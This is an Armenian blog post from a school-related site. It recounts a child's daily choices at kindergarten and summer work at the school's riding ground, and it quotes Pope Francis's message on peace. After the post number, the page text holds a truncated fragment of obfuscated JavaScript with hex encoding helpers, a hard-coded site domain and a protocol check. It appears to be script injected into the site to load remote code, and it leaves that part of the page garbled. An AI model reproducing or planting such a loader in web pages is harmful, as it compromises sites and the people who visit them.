Կյանքն ընտրություն է, ու Դավիթ Բլեյանն ամեն օր իր ընտրությունը կատարում է, ստանում անհրաժեշտ աջակցություն ու հնարավորություն դրա համար: Ի՞նչ ճիշտ, ի՞նչ սխալ, եթե դա քո ընտրությունն է… Խումբ է ընտրել ժամանակին, հիմա՝ նաև հինգ տարեկանների իրենց դասարանը, տենդագին պատրաստվում-մեծանում է դրա համար, առյուծի պես՝ ուժեղ, ճարպիկ ու խելացի… Կոշիկներ է ընտրում. այսօր չհավանեց, հենց աստիճանների գլխին նստեց, հանեց-շպրտեց «էս ապուշությունը», ինքնուրույն հագավ իր ընտրածը: Եվ լավ է: Լավ է, որ կոշիկներն իր նոր դրսում բոկոտիկ են, իսկ խմբասենյակ կամ տուն մտնելիս իրենք իրենց դառնում են հողաթափեր… Կոշիկն այսպես փոփոխվում է ու ստացվում  երկուսը մեկում. մեկը բավարար է.
— Ինձ ուրիշ կոշիկ պետք չի…
Ոտից չի հանում…
Քնած ժամանակ, բազմոցին կհանես… Ով կհանի…

Քոլեջի Լիլիթ Մեղրյանի խմբի Եվան ու Հայկը։
Լուսանկարները՝ Մարիետ Սիմոնյանի։

Իրիկունն անհամբեր սպասում է պարտեզ գնալուն, իր ընկերներին. պարտեզին՝ իր լողով, միջավայրով, դաստիարակներով… կարոտում է…
— Հիմա ի՞նչ, պա՛պ, Զառան ամեն օր մեր խո՞ւմբ է գալու…
Դպրոցի ղեկավար Տաթև Բլեյանին փոխարինած Զառա Առաքելյանին նկատի ունի, ում մեդիայից է ճանաչում. սիրելի պլանշետը տուն բերած Զառան է։
— Տաթև քույրիկին էլ կգնամ իրենց տանը կտեսնեմ, իմ ծաղիկներից կտանեմ, համ էլ Արևիկի հետ կխաղամ…
— Թող Տաթև քույրիկն իր ասած կուկուին բերի… Իր միջից է, չէ՞ հանում՝ ինչ ուզում է, էն էլ թող հանի…

Պարտեզում՝ ավազների մեջ,  իր խմբի Նարեի, Վարդուհու հետ խաղում է ինքնամոռաց. Ադրիանան ու Անուլիկը խնդիրներ են ունեցել առողջական տիպի։ Նա ամեն ինչ գիտի իր աղջիկների մասին, իմ բոլոր հարցերին պատասխանում, մտահոգություններս փարատում է.
— Պա՛պ, դարդ մի՛ արա, վաղը կգաս կտեսնես, բոլորն էլ առողջ-ուրախ եկել են…
Արմինե մայրիկն ուզում է մեկ ժամ շուտ Դավթին տուն տանի. Նարեից, Վարդուհուց, խաղից ո՞նց կկտրես էս ագահին…
— Դու քո գործով զբաղվի, մի քիչ էլ խաղամ, գամ, մամ…
— Դավի՛թ, բոլոր գործերը պրծել եմ էստեղ, իմ գործերը հիմա տանն են, մենա՞կ գնամ…
— Ո՞նց ես պրծել… գնա երեխեք գտի, դաս տուր…

Լեռ Կամսարի «Կենդանիներու համագումարը» Կենտրոնում։
Լուսանկարները՝ Սոֆյա Այվազյանի բլոգից։

Էս դպրոցում էլ, թարսի պես, միշտ երեխա կա…
Ես, հրեն, իրիկունը յոթի մոտ ճամփես Սեբաստացի մոլ-Վերնիսաժ-Կենտրոնից թեքեցի, մեր տնտեսության ձիարշավարան մտա, Խորենի-Լուսինեի հետ խաղաղ զրուցեցի անելիքից, ծանոթացա օրվա արածին. որքա՜ն առաջ են գնացել աշխատանքի ջոկատով։ Հատիկ-հատիկ անցա Սոնա-Զառա ընկերության աշխատանքային ջոկատի հետքերով՝ փառավորվեցի։ Հետո քանդակագործ Աշոտ Երիցյան ու Զառա Ոսկանյան ստեղծագործական տանդեմի խմբի աշխատանքներով տարվեցի… Ծով աշխատանք. մեր ձիանոց-ձիավարժարանը ոչ միայն պիտի լինի ամենահիգիենիկը, ուսումնականը, բուժիչ-առողջարարը, այլև ամենագեղագիտականը։ Վաղը Գեղարվեստի ջոկատի աղջիկները կշատանան այստեղ։ Այս տարածքը մի շրջան պիտի Խորեն Հազարումյանի, Քնարիկ Ներսիսյանի, Անահիտ Մելքոնյանի, Աշոտ Երիցյանի, Սոնա Փափազյանի-ընկերների, աշխատանքի ջոկատների կայանատեղին դառնա, ես էլ երևի այստեղ տնօրենի վրանը խփեմ, որ ժամանակին հասցնենք։

Աշխատանքային ջոկատների առավոտյան հավաքը ձիավարժարանում։
Լուսանկարները՝ Սոնա Փափազյանի։

Իսկ Դպրոց-պարտեզում, ոնց որ ուսումնական երկարօրյայի կամ ճամբարային ցերեկային առօրյայի ժամանակ, լողում են, ուտելու պատրաստություն տեսնում, ճամբարը ձևավորում… ծնողներով-ուսուցիչներով վեց-տասը տարեկանների մեծ խմբերով ու վրաններով… Լողացած-կազդուրված, հմայքը բազմապատկած Զառա-Սոնա ղեկավարներով…

Ճիշտը երթալն է, ու ես ութին մոտ հազիվ պոկվեցի էս գժությունից… ես ձեր տարիքի՞ն եմ, ձեր առողջությո՞ւնն ունեմ, հոգնում եմ, չէ՞… Ու սլացա՝ խաղալով, ճախրա՜նք… հայրենագիտական ու Բլեյան տեսած, անկնկալի եկած մարդկանց հետ դադարներով, իհարկե: Վայելքի-ստեղծումի ամառ բոլորիդ:

Հռոմի պապ Ֆրանցիսկոսի ուխտագնացություն-այցին իմ երկիր սպասում եմ, իհարկե: Ողջույնը կարդացի-լսեցի… Արժանի Պապ ունենք՝ հոգևոր առաջնորդ է իր կյանքով-խոսքով… Չես անջատի խոսքն ու գործը, երկուսը՝ մեկում, ինչպես Դավիթ Բլեյանի մոտ՝ անանջատ, խոսեց անցավ գործի՝ գործը խոսեց… Իմ սիրած, բազմիցս գործածած վերնագրերից է խոսքը՝ արարք: Ես քաղաքական գործունեությունն սկսել եմ այս դևիզով ու… գնահատեք, նո՞ւյնն է մնացել կտակարանային իմը… Հիմա ամենից շատ առանձին տողեր են շրջանառում Պապի խոսքից. կարճ-ամբողջական խոսք է, ինչո՞ւ ամբողջը չասել: Իսկ եթե տեղն է խնդիրը, ես, ահա, ընդգծեցի ընթերցողի համար.

Թույլ չտանք ցավոտ հիշողություններին տիրանալու մեր սրտին: Նույնիսկ չարի շարունակական հարձակումներին չհանձնվենք: Գործենք ինչպես Նոյը, ով ջրհեղեղից հետո չհոգնեց դեպի երկինք հայացք նետելուց և մի քանի անգամ աղավնի ուղարկեց, մինչև որ նա չվերադարձավ ձիթապտղի մատղաշ տերևով: Դա նշան էր, որ կյանքը կարելի էր վերսկսել և հույսը պետք է հարություն առներ: Որպես Ավետարանի ծառա և խաղաղության սուրհանդակ ցանկանում եմ գալ ձեր մեջ` նեցուկ կանգնելու խաղաղության ճանապարհին գործադրած յուրաքանչյուր ջանքին և միասին քայլելու հաշտության արահետով, որը հույս է ծնում:
Հռոմի Պապ Ֆրանցիսկոս

Պապը մեզ, մեր կյանքին, մեր աշխարհին գալիս է խաղաղություն ավելացնելու…

Անահիտ Մելքոնյանի ջոկատը ձիավարժարանում։
Լուսանկարները՝ Անահիտ Մելքոնյանի։

#711

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ashotbleyan.mskh.am"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Թողնել պատասխան

Ձեր էլ-փոստի հասցեն չի հրապարակվելու։ Պարտադիր դաշտերը նշված են *-ով

Explore More

Նոր գրքեր գրեք, որ ես տանելու բան ունենամ

Հուլիսը նոր-նոր է իր իրավունքների մեջ. այս աջուձախ հաստատված «անշարժ-անհաղթահարելի-անտանելին» ուրիշ ի՞նչ է, եթե ոչ երևանյան բանգլադեշյան իրավունք ամառվա՝ հուլիսի… Ոռոգման հետ կապված հոգսերը դառնում են առաջնային-կարևոր, ու դրանք անվերջանալի

Որ աշնան ցնծուն տագնապում, արշավող ցրտերի դիմաց․․․ հաշվիչին նայեք․ 1497-րդ գիրն է

Այս հարցախեղդը տոնական, որին ես դիմադրեցի՝ որքան կարող էի, Դավիթը հետաձգեց՝ որքան Լուսինե Փաշայան ուսուցչի առաջադրանքի վերջին ժամկետն էր, Արմինեն, Աստղիկով տարված, ձգեց հարցազրույցի մոնտաժն այնքան, մինչև Լուսինե ընկերուհին օգնության

Երրորդ մուտքից

«3-րդ մուտք» նախագծում զրույցը լրագրող  Հեղինե Ասրյանի հետ այսպիսի խճանկար դարձավ։